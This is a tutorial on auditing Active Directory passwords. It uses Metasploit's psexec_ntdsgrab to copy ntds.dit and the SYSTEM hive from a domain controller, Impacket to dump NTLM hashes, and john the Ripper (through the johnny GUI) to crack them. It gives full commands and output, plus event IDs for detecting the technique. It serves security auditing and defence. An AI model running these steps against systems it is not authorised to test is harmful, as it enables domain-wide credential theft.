AD Password Audit with Metasploit, Impacket, and Johnny

This tutorial is geared toward those who are running these commands on a *nix type system. These steps were conducted on a system running Parrot Security OS. Many of the tools used come stock on security-focused Linux distributions like Kali Linux and Parrot OS.


Get domain admin credentials

This just isn’t possible without them!

Install metasploit (if you don’t have it already)

Nightly installers are available here.

Grab impacket

Impacket will be used for dumping hashes from ntds.dit and the SYSTEM hive.

git clone

Configure johnny/john

johnny will be used to crack hashes. It’s a GUI for john the ripper–Jumbo john in this case.

Add custom wordlist at /usr/share/wordlists/custom/top-10000.lst (or wherever works since root privileges are needed to add files to /usr/share/wordlists)

cd /usr/share/wordlists
sudo mkdir custom && cd custom/
sudo wget -O top-10000.lst

Do check out the great collection of password lists at the SecLists project!

Lift ntds.dit using Metasploit

Definition from servergeeks:

Ntds.dit is the main AD database file. NTDS stands for NT Directory Services. The DIT stands for Directory Information Tree. The Ntds.dit file on a particular domain controller contains all naming contexts hosted by that domain controller, including the Configuration and Schema naming contexts. A Global Catalog server stores the partial naming context replicas in the Ntds.dit right along with the full Domain naming context for its domain.

The psexec_ntdsgrab module will be used to create Volume Shadow Copies of the ntds.dit and SYSTEM hive and grab them from the domain controller. It requires domain administrator credentials.

Select module

Type msfconsole at a shell prompt to launch Metasploit.

Type use <module name> to select a module. In this case, it’s the psexec_ntdsgrab module:

msf5 > use auxiliary/admin/smb/psexec_ntdsgrab

Configure module-level options

Type options to view the configuration options available for the module.

Use set <option> <value> to configure the target host and credentials:

msf5 auxiliary(admin/smb/psexec_ntdsgrab) > set RHOSTS
msf5 auxiliary(admin/smb/psexec_ntdsgrab) > set SMBUser fancyadmin
SMBUser => fancyadmin
msf5 auxiliary(admin/smb/psexec_ntdsgrab) > set SMBPass thebestpasswordever000000)
SMBPass => thebestpasswordever000000)

There are other configuration options available for the module; however, they weren’t needed to conduct this password audit.

Run the module

It took multiple runs to get ntds.dit and SYSTEM hive downloaded. There seems to be a timing issue related to when the Volume Shadow Copy Service starts. Running the module, waiting about 2 minutes, then running it again seemed to work. In a tiny test domain with just a handful of users, the download of the files took very little time.

Take note of the paths to the .dit and .bin files.

msf5 auxiliary(admin/smb/psexec_ntdsgrab) > run
[*] Running module against

[*] - Checking if a Volume Shadow Copy exists already.
[+] - Service start timed out, OK if running a command or non-service executable...
[-] - Unable to read file \WINDOWS\Temp\jNpypBbHUMXmZDug.txt. Rex::Proto::SMB::Exceptions::ErrorCode: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=45 WordCount=0).
[-] - Unable to determine if VSS is enabled: undefined method `each_line' for nil:NilClass
[*] - Creating Volume Shadow Copy
[+] - Service start timed out, OK if running a command or non-service executable...
[+] - Volume Shadow Copy created on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[+] - Service start timed out, OK if running a command or non-service executable...
[*] - Checking if NTDS.dit was copied.
[+] - Service start timed out, OK if running a command or non-service executable...
[+] - Service start timed out, OK if running a command or non-service executable...
[*] - Downloading ntds.dit file
[+] - ntds.dit stored at /home/lab/.msf4/loot/[blah]_psexec.ntdsgrab._104930.dit
[*] - Downloading SYSTEM hive file
[+] - SYSTEM hive stored at /home/lab/.msf4/loot/[blah]_psexec.ntdsgrab._438132.bin
[*] - Executing cleanup...
[+] - Cleanup was successful
[*] Auxiliary module execution completed

Extract hashes from ntds

Impacket’s script is used to extract hashes from the ntds.dit and system hive.

./impacket/examples/ -ntds /home/lab/.msf4/loot/[blah]_psexec.ntdsgrab._104930.dit -system /home/lab/.msf4/loot/[blah]_psexec.ntdsgrab._438132.bin -hashes lmhash:nthash LOCAL -outputfile ntlm_hashes
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Target system bootKey: 0x34c74cdea667fafe83b8a6512e3c9ab9
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: d1b6549674a9acadb2545e7eaf24c645
[*] Reading and decrypting hashes from /home/lab/.msf4/loot/[blah]_psexec.ntdsgrab._104930.dit
**** here it rains hashes but the real goods are in ntlm_hashes.ntds! ***

Crack Hashes with johnny

NOTE: this might be slightly different depending which version of the john binary is installed so it might not hurt to do a which john or a search of the file system to determine which version is installed. The jumbo john executable ships with Parrot OS, so instructions will reference that where relevant. It really only matters for the rules.

Type johnny at a shell prompt.

johnny settings page

Select the Settings page using the menu on the left. Populate the john the Ripper executable field if it isn’t already populated. To use the stock jumbo john executable that’s included with Parrot OS, add /usr/sbin/john.

johnny file menu options

Use the menu options File > Open Password File (PASSWD format) and select the ntlm_hashes.ntds file that was just created by impacket.

johnny session options page

Select Options page using the menu on the left. Select the Wordlist tab and select the path to the custom wordlist downloaded earlier. Check the Use rules box and type Jumbo. Select NT in the Current hash format dropdown.

johnny passwords tab with password hashes loaded

Click Start new attack from the menu at the top.

john console log output with cracked passwords

The cracked passwords may not display on the Passwords page. They will, however, show up on the Console log page which shows all the command line options that were provided to the john executable and all the output to stdout. This is also handy because the john command and all the arguments in the log output make it easier to later conduct the same password cracking activities from a command shell.

Null hashes?

The hashes aad3b435b51404eeaad3b435b51404ee (LM) and 31d6cfe0d16ae931b73c59d7e0c089c0 (NTLM) represent a null password. These may occur if the account was disabled. The null LM hash is usually encountered in modern Windows environments as LM (Lan Manager) authentication is disabled by default because it’s insecure and outdated!

Detection Notes

Interesting events observed with ntdsgrab usage:

Special logon event 4672 - A special logon occurs on the domain controller with the credentials being used by the ntdsgrab session.

VSS service start event 7036 - The Microsoft Software Shadow Copy Provider service launches so ntdsgrab can do its thing.

Ntds grab service event 7045 - The Service File Name is interesting and shows how ntdsgrab dumps ntds.dit to a temporary location.

SYSTEM hive grab service event 7045 - The Service File Name is interesting and shows how ntdsgrab saves the SYSTEM hive to a temporary location.


If you’ve read this far, you’ve got the know how to conduct an AD password audit! If you follow these steps in your lab, would you please reach out and let me know how they work for you? Twitter is great for that. I’d really appreciate the feedback.

Happy hacking!


Active Directory files and their functions

Cracking Domain Passwords from NTDS.dit with Metasploit and john

Extracting and Cracking NTDS.dit

Cracking Windows NTLM hashes with Crackq (